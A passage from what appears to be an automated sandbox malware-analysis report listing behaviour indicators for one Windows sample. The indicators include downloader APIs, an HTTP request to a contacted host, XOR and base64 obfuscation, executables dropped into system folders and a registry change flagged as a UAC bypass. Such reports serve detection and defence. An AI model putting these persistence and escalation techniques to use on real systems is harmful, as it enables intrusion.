\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"WSASend\" (Indicator: \"WSASend\"; Source: \"00000000-00005596-00000C29-62988183\")\n Found reference to API \"WSARecv\" (Indicator: \"WSARecv\"; Source: \"00000000-00005596-00000C29-62988438\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"URLDownloadToCacheFileA\" (Indicator: \"URLDownload\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"URLDownloadToCacheFileA\" (Indicator: \"URLDownload\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found string \"GET /article.php?id=103822 HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp\")\n Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"rundll32.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-169", "type": 2, "relevance": 1, "name": "Found mail related domain names", "description": "Observed email domain:\"pop3.163.com\" [Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f]\n Observed email domain:\"ten.sdapop.evres\" [Source: 00000000-00005596.00000001.67056.00190000.00000004.mdmp]\n Observed email domain:\"www.gmx.net\" [Source: 00000000-00005596.00000001.67056.00190000.00000004.mdmp]\n Observed email domain:\"pop3.163.com\" [Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp]", "origin": "File/Memory", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-143", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a new HTTP request", "description": "\"rundll32.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /article.php?id=103822\" - (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /article.php?id=103822\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"rundll32.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (UID: 00000000-00005596)\n \"rundll32.exe\" called \"InternetOpenW with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/article\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Encoding\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"gzip\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"MSIE\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"NET4\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"InfoPath\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Host\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor byte ptr [3F9073B7h]\n ch in Stream UID: 39956-89-0040A570", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Contains ability to create a new HTTP request (API string)\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Contains ability to communicate with network (API string)\n Matched sigs: Contains ability to create a HTTP or FTP session (API string)\n Matched sigs: Calls an API typically used to create a HTTP or FTP session\n Matched sigs: Calls an API typically used to create a new HTTP request\n Matched sigs: Contacts server\n Matched sigs: Contacts domains\n Matched sigs: Spawned process connects to a network", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp\")\n Found string \"\\Device\\{90A066FE-591C-47F3-850D-9644B684FBA5}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005596.00000000.66925.00190000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-342", "type": 2, "relevance": 1, "name": "Contains reference to Hijacked CLSID(s)", "description": "Observed string: \"CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\" (Indicator: \"{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\") in Source: 00000000-00005596.00000001.67056.00190000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%1\" %*\"), \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\"), \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PSCHED\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\PSCHED\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"AUTODIALDLL\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"rundll32.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"9ncalrpc:[epmapper,Security=Impersonation Dynamic False]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE810B79F0AC04437E9652FC3C0203]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLEF993F56D23BC473A9ADE2D5BBA05]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"A+ncalrpc:[OLEF993F56D23BC473A9ADE2D5BBA05]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE28E0D5FCCD0342288EDD59F9D988]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"I+ncalrpc:[OLE810B79F0AC04437E9652FC3C0203]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "string-63", "type": 2, "relevance": 3, "name": "Found a potential E-Mail address in binary/memory", "description": "Pattern match: \"s@online.ie\"\n Pattern match: \"hapubws@it.altervista.org\"\n Pattern match: \"hapubws@ggsearch.2345.com\"\n Pattern match: \"hapubws@skimresources.com\"\n Pattern match: \"hapubws@www.babycenter.com\"\n Pattern match: \"hapubws@y.one.impact-ad.jp\"\n Pattern match: \"hapubws@config.parsely.com\"\n Pattern match: \"hapubws@urbandictionary.com\"\n Pattern match: \"hapubws@www.microsoft.com\"\n Pattern match: \"hapubws@www.gamesgames.com\"\n Pattern match: \"hapubws@secure-assets.rubiconproject.com\"\n Pattern match: \"hapubws@wayfair.com\"\n Pattern match: \"hapubws@same.eastmoney.com\"\n Pattern match: \"hapubws@gateway.foresee.com\"\n Pattern match: \"hapubws@jalan.net\"\n Pattern match: \"hapubws@nextag.com\"\n Pattern match: \"hapubws@www.rakuten.co.jp\"\n Pattern match: \"hapubws@homedepot.com\"\n Pattern match: \"hapubws@www.kohls.com\"\n Pattern match: \"hapubws@allabout.co.jp\"\n Pattern match: \"hapubws@bidswitch.net\"\n Pattern match: \"hapubws@bat.bing.com\"\n Pattern match: \"hapubws@brothersoft.com\"\n Pattern match: \"hapubws@accengage.net\"\n Pattern match: \"hapubws@afy11.net\"", "origin": "File/Memory", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "stream-106", "type": 1, "relevance": 7, "name": "Contains ability to execute program", "description": "WinExec@KERNEL32.dll at 39956-108-00405290\n WinExec@KERNEL32.dll at 39956-94-004086F0\n WinExec@KERNEL32.DLL at 00000000-00006120-43002-37-00405290\n WinExec@KERNEL32.DLL at 00000000-00006120-43002-23-004086F0", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" claimed CRC 79767 while the actual is CRC 128409\n \"notepad_.exe\" claimed CRC 79767 while the actual is CRC 131938\n \"rundll32.exe\" claimed CRC 79767 while the actual is CRC 96273\n \"_.exe\" claimed CRC 79767 while the actual is CRC 153281", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n RegDeleteValueA\n RegCreateKeyExA\n RegOpenKeyExA\n GetFileAttributesA\n GetTickCount\n GetVersionExA\n GetModuleFileNameA\n LoadLibraryA\n WinExec\n GetStartupInfoA\n OpenProcess\n CreateDirectoryA\n DeleteFileA\n ReadProcessMemory\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n GetModuleHandleA\n GetTempFileNameA\n GetSystemDirectoryA\n TerminateProcess\n Sleep\n ShellExecuteA\n FindWindowA\n GetWindowThreadProcessId\n FindWindowExA\n HttpSendRequestA\n InternetCloseHandle\n InternetOpenA\n InternetReadFile\n InternetConnectA\n HttpQueryInfoA\n socket\n recv\n send\n WSAStartup\n connect\n closesocket", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00006120]\n \"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47CFD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\¢«.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\notepad¢¬.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\system\\rundll32.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called 